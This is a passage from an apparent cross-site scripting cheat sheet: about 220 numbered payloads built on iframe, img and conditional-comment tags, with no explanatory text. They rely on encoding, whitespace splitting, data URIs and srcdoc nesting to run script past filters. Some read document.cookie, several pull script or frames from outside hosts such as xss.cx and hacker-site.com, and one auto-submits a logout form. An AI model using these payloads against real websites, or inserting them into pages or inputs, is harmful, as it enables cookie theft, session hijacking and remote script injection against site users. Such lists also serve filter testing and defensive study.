  2451. <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2452. <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2453. <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2454. <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2455. <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2456. <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2457. <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2458. <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  2459. <iframe src=&#74avascript&colon;aler&#x74(53)>
  2460. <iframe/src=about:blank onload=alert(1)>
  2461. <iframe src=”//brutelogic.com.br/tests/status.html” onload=”frames[0].postMessage(‘<script>alert(document.domain)’,’*’)”>
  2462. <iframe src=”data:D,<script>confirm(top.document.body.innerHTML)</script>”>
  2463. <iframe src=”data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
  2464. <iframe src=”data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E”></iframe>
  2465. <iframe src=\”data:),<script>alert(document.domain)</script>”></iframe>
  2466. <iframe/src=”data:text/html,
  2467. <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
  2468. <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
  2469. <IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
  2470. <iframe src=”data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=”/>
  2471. <iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe> (Firefox, Chrome, Safari)
  2472. <iframe src=”data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;”></iframe>
  2473. <iframe/src=”data:text/html&p=<svg/onload=alert(49)>”>
  2474. <iframe src=”data:text/html,<script>alert(0)</script>”></iframe> (Firefox, Chrome, Safari)
  2475. <iframe/src=”data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>”;>
  2476. <iframe src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>
  2477. <iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>
  2478. <iframe/src=”data:text/html,<svg &#111;&#110;load=confirm(1)>”>
  2479. <iframe/src=”data:text/html,<svg onload=alert(1)>”>
  2480. <iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
  2481. <iframe/src=”data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
  2482. <Iframe / src = “data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==”>
  2483. <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
  2484. <iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’>
  2485. <iframe srcdoc=”&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>”>
  2486. <iframe srcdoc=\”&lt;iframe srcdoc=’&amp;lt;iframe onload=alert(1)&amp;gt;’&gt;\”></iframe>
  2487. “><iframe srcdoc=”&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;”>
  2488. <iframe srcdoc=”&lt;script&gt;alert(1)&lt;/script&gt;”></iframe>
  2489. <iframe srcdoc=’&lt;svg/onload=alert(1)&gt;’>
  2490. <iframe srcdoc=’&lt;svg/onload=alert(/@80vul/)&gt;’>
  2491. <iframe srcdoc=’&lt;svg/onload=confirm(3)&gt;’>
  2492. <iframe srcdoc=<svg/onload=alert(1)>>
  2493. <iframe srcdoc=”<svg onload=alert(1)&nvgt;”></iframe>
  2494. <iframe srcdoc=”<svg/onload=confirm(domain)>”>
  2495. <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;173)&gt;>
  2496. <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
  2497. <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
  2498. <iframe src=”http://0x.lv/xss.swf"></iframe>
  2499. <IFRAME SRC=��http://hacker-site.com/xss.html��>
  2500. <IFRAME SRC=http://hacker-site.com/xss.html>
  2501. <iframe src=http://ha.ckers.org/scriptlet.html <
  2502. <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
  2503. <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
  2504. <iframe src=”http://localhost"></iframe>
  2505. <iframe src=”http://target.com/something.jsp?inject=<script>eval(name)</script>" name=”alert(1)”></iframe>
  2506. <iframe/src=”http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
  2507. <iframe/src=”http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
  2508. “> “><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> “><iframe src=http://xss.cx onload=confirm(8) <
  2509. <iframe src=”http://xss.cx?x=<iframe name=x></iframe>”></iframe><a href=”http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
  2510. <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
  2511. <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
  2512. <iframe src=http://xss.rocks/scriptlet.html <
  2513. /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>
  2514. /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt/*iframe/src*/>
  2515. <iframe src iframe src=”javascript:javascript:alert(1)”></iframe src>
  2516. <iframe src=”jar://html5sec.org/test.jar!/test.html”></iframe>
  2517. <iframe src=”jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”></iframe>
  2518. <iframe src=”javascript:%61%6c%65%72%74%28%31%29"></iframe>
  2519. <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe>
  2520. <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)
  2521. <iframe src=javascript:alert(1)>
  2522. <iframe src=javascript:alert(1)>
  2523. <iframe src=javascript:alert(161)>
  2524. <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! — 
  2525. <iframe src=”java script:alert(1)” height=0 width=0 /><iframe>
  2526. <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe> <! — 
  2527. <iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe>
  2528. → <iframe src=java script:alert(1); height=0 width=0 /><iframe>
  2529. <iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! — Java
  2530. <iframe src=”javascript:alert(1)”></iframe>
  2531. <iframesrc=”javascript:alert(2)”>
  2532. <IFRAME SRC=”javascript:alert(29);”></IFRAME>
  2533. <iframe src=”javascript:alert(69)%%0D3C! — 
  2534. <iframe src=”javascript:alert(71)%%0D3C! — 
  2535. “><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>
  2536. <IFR AME src=javascript:alert(‘XSnS’)></IFRA ME>
  2537. “><iframe src=”javascript:alert(XSS)”>
  2538. ><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
  2539. ��><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
  2540. ><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
  2541. <iframe src=”javascript:alert(‘XSS by \nxss’);”></iframe><marquee><h1>XSS by xss</h1></marquee>
  2542. ><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>
  2543. <;IFRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/IFRAME>;
  2544. <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  2545. <IFRAME SRC=”javascript:alert(XSS);”></IFRAME>
  2546. <iframe// src=javaSCRIPT&colon;alert(1)
  2547. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  2548. <iframe src=javascript&colon;confirm&lpar;document&period;location&rpar;>
  2549. <IFRAME SRC=”javascript:confirm(5);”></IFRAME>
  2550. “><iframe/src=javascript:co\u006efir\u006d%28 1%29>
  2551. <iframe src=”javascript:document.vulnerable=true; <
  2552. <IFRAME SRC=”javascript:document.vulnerable=true;”></iframe>
  2553. <iframe/src=’javascript:if(null==null){javascript:0?1:confirm(1);}’>
  2554. <IFRAME SRC=”javascript:javascript:alert(1);”></IFRAME>
  2555. “><iframe/src=javascript:prompt(1)>
  2556. <iframe src=”javascript:’<script src=http://xss.cx ></script>’”></iframe>
  2557. <iframe src=”javascript:’<script src=//pkav></script>’”>
  2558. <iframe src=”javascript:’<script src=>;</script>’”></iframe>
  2559. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
  2560. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
  2561. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  2562. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  2563. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  2564. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  2565. <iframe/src=j&Tab;av&Tab;as&Tab;cri&Tab;pt&Tab;:co&Tab;nfir&Tab;m&Tab;(&Tab;&Tab;1&Tab;)>
  2566. <iframe src=//localhost/self/logout.php
  2567. <iframe src=LOGOUT_URL onload=forms[0].submit()>
  2568. <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
  2569. <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
  2570. “><iframe src=’’ onload=alert(‘atul’)>
  2571. <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
  2572. <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
  2573. <iframe/src \/\/onload = prompt(1)
  2574. “><iframe/src \/\/onload = prompt(1)
  2575. <IFRAME SRC=# onmouseover=”alert(document.cookie)”></IFRAME>
  2576. <iframe src=”” onmouseover=”confirm(document.cookie)”>
  2577. <iframe src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
  2578. <iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
  2579. <iframe src=%(scriptlet)s <
  2580. <iframe src=””srcdoc=”data:,&lt;svg/onload&equals;alert(191)>”191=” sandbox>
  2581. <iframe src=””/srcdoc=’&lt;svg onload&equals;alert&lpar;1&rpar;&gt;’>
  2582. <iframe src=”#” style=width:exp/**/ressi/**/on(confirm(1))>
  2583. <iframe src=”&Tab;javascript:prompt(1)&Tab;”>
  2584. <iframe src=”&Tab;javascript:prompt(1)&Tab;”>
  2585. <iframe src=’//target.com/vulnpage.php?a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.characterSet);//’>
  2586. <iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
  2587. <iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e
  2588. ><iframe src=/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)
  2589. “><iframe src=”/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)”
  2590. <iframe src=”vbscript:document.vulnerable=true;”>
  2591. <iframe src=”vbscript:msgbox(1)”></iframe>
  2592. <iframe src=”vbscript:msgbox(1)”></iframe> (IE)
  2593. <iframe src=”\x01javascript:alert(0)”></iframe> <! — Example for Chrome →
  2594. <iframe src=”&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;”></iframe>
  2595. <iframe src=”x-javascript&colon;alert(document.domain);”></iframe>
  2596. <iframe src=x onerror=prompt(1)>
  2597. <iframe style=display:none name=x></iframe>
  2598. <iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
  2599. “><iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
  2600. <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>
  2601. <iframe width=0 height=0 src=”javascript:confirm(1)”>
  2602. <IFRAME width=”420" height=”315" frameborder=”0" onload=”alert(document.cookie)”></IFRAME>
  2603. <iframe xmlns=”#” src=”javascript:alert(1)”></iframe>
  2604. <! — [if]><script>alert(1)</script →
  2605. <! — [if]><script>alert(1)</script →
  2606. <! — [if]><script>alert(1)</script → <! — [if<img src=x onerror=alert(1)//]> →
  2607. <! — [if]><script>alert(1)</script → // Works upto IE9 ?http://html5sec.org/#115
  2608. <! — [if]><script>confirm(1)</script →
  2609. <! — [if]><script>javascript:alert(1)</script →
  2610. <! — [if WindowsEdition]><script>confirm(location);</script><![endif] →
  2611. <image img=javascript:alert(XSS@%2Bdocument.domain caption= />
  2612. <image src=1 href=1 onerror=”javascript:alert(1)”></image>
  2613. <image src=”https://github.com/dummy.jpa href=1 onerror=”javascript:alert(document.cookie)”></image>
  2614. <image src=”javascript:alert(1)”>
  2615. <image src=”javascript:alert(2)”> // IE6, O10.10, OM10.0
  2616. <image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
  2617. <IMG />”>
  2618. <IMG />
  2619. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  2620. <img%09onerror=alert(1) src=a>
  2621. <IMG%0aSRC%0a=%0a”%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a’%0aX%0aS%0aS%0a’%0a)%0a”%0a>
  2622. <IMG%20DYNSRC=”javascript:alert(‘WXSS’)”>
  2623. <IMG%20LOWSRC=”javascript:alert(‘WXSS’)”>
  2624. <IMG%20"””><SCRIPT>alert(“WXSS”)</SCRIPT>”>
  2625. <IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  2626. <IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2627. <IMG%20SRC=”%20&#14;%20javascript:alert(‘WXSS’);”>
  2628. <IMG%20SRC=’%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)’>
  2629. =<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
  2630. >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  2631. >”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  2632. <IMG%20SRC=’javasc ript:alert(document.cookie)’>
  2633. <IMG%20SRC=’javascript:alert(document.cookie)’>
  2634. <IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>
  2635. <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
  2636. <IMG%20SRC=`javascript:alert(“‘WXSS’”)`>
  2637. <IMG%20SRC=”jav ascript:alert(‘WXSS’);”>
  2638. <IMG%20SRC=”javascript:alert(‘WXSS’);”>
  2639. <IMG%20SRC=”javascript:alert(‘WXSS’)”
  2640. <IMG%20SRC=javascript:alert(‘WXSS’)>
  2641. <IMG%20SRC=JaVaScRiPt:alert(‘WXSS’)>
  2642. <IMG%20SRC=”jav&#x09;ascript:alert(‘WXSS’);”>
  2643. <IMG%20SRC=”jav&#x0A;ascript:alert(‘WXSS’);”>
  2644. <IMG%20SRC=”jav&#x0D;ascript:alert(‘WXSS’);”>
  2645. <img%20src=x%20onerror=alert(1)>
  2646. <IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  2647. <img=”=”%20title=’”><img src=”=”onerror=alert(1)>”>’
  2648. <img[a][b][c]src[d]=x[e]onerror=[f]”alert(1)”>
  2649. <img/alt=1 onerror=eval(src) src=x:alert(alt) >
  2650. <![><IMG ALT=”]><SCRIPT>confirm(1)</SCRIPT>”>
  2651. <IMG ALT=”><SCRIPT>confirm(1)</SCRIPT>”(EOF)
  2652. <img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
  2653. <IMG DYN id=XSS SRC=”javascript:alert(‘XSS’)”>
  2654. <IMG DYNid=XSS SRC=”javascript:alert(‘XSS’)”>
  2655. <IMG+DYNSRC=”javascript:alert(1);”>
  2656. <IMG DYNSRC=”javascript:alert(‘XhSS’)”>
  2657. <;IMG DYNSRC=”;javascript:alert(‘;XSS’;);”;>;
  2658. <IMG DYNSRC=”javascript:alert(‘XSS’);”>
  2659. <IMG DYNSRC=”javascript:alert(‘XSS’)”>
  2660. <IMG DYNSRC=”javascript:alert(XSS)”>
  2661. <IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
  2662. <IMG DYNSRC=”javascript:confirm(document.location)”>
  2663. <img dynsrc=”javascript:document.vulnerable=true;”>
  2664. <img DYNSRC=”javascript:document.vulnerable=true;”>
  2665. <IMG DYNSRC=”javascript:javascript:alert(1)”>
  2666. <IMG DYNSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  2667. <img/id=”alert&lpar;&#x27;XSS&#x27;&#x29;\”/alt=\”/\”src=\”/\”onerror=eval(id&#x29;>
  2668. <img id=��><��class=��><��src=��>��onerror=alert(9)>
  2669. <img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id)>’”>
  2670. <IMG id=XSS SRC=”&14;javascript:alert(‘XSS’);”>
  2671. <IMG id=XSS SRC=&{alert(‘XSS’);};>
  2672. <img id=XSS SRC=”blah>”onmouseover=”alert(‘XSS’);”>
